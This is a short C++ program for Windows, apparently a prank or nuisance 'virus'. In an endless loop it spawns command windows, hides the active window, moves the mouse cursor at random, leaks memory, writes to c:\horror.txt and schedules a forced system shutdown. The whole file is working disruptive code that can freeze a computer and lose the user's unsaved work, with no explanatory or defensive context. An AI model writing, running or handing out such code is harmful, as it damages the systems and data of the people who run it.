#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
signed main()
{
while(1)
{
system("start cmd");
HWND hWnd=GetForegroundWindow();
ShowWindow(hWnd,SW_HIDE);
SetCursorPos(rand()%1000,rand()%1000);
malloc(1000);
system("horror>>c:\\horror.txt");
system("shutdown -s -t 300");
}
}